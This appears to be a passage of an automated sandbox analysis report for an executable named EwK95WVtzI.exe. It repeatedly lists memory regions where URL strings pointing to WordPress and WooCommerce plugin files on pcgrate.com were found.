                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
